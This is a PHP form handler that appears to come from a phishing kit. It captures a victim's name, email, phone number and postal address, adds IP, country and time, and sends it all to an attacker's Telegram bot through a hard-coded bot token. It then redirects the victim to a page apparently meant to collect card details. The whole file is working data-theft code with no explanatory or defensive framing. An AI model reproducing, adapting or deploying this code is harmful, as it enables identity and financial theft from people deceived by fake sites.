<?php
session_start();


 if(isset($_POST['name'])){

$_SESSION['name'] = $_POST['name'];


include("../config/Sys.php");
include "../config/n8.php";
include "../config/xdawla.php";




$get_user_country     = get_user_country();
$date = date('m/d/Y h:i:s a', time());
$ip = getenv("REMOTE_ADDR");
$link = $_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'] ;


{
$hostname = gethostbyaddr($ip);
$maz .= "+------- khalifa ------+\n";
$maz .= "* name : ".$_POST['name']."\n";
$maz .= "* email : ".$_POST['email']."\n";
$maz .= "* phone : ".$_POST['phone']."\n";
$maz .= "* adres : ".$_POST['adres']."\n";
$maz .= "* city : ".$_POST['city']."\n";
$maz .= "* post : ".$_POST['post']."\n";
$maz .= "+------INFO------+\n";
$maz .= "* Country: #$get_user_country\n";
$maz .= "* IP   : $ip\n";
$maz .= "* OS   : $user_os\n";
$maz .= "* TIME : $date\n";
$maz .= "* SUM  : $user_browser\n";
$maz .= "+-------------------+\n";



$token ='6384881610:AAFCma01A350PHgZD4PsMnZXiDisgHADguw';
$data = [
    'text' => $maz,
    'chat_id' => $chat_id,
];

file_get_contents("https://api.telegram.org/bot$token/sendMessage?" . http_build_query($data) );

}


header("Location: ../waitincard.html?FC=1B6MdQ1bshwGg9rQvSIhXQGzguI0h0Ia#_$dispatch");

}
?>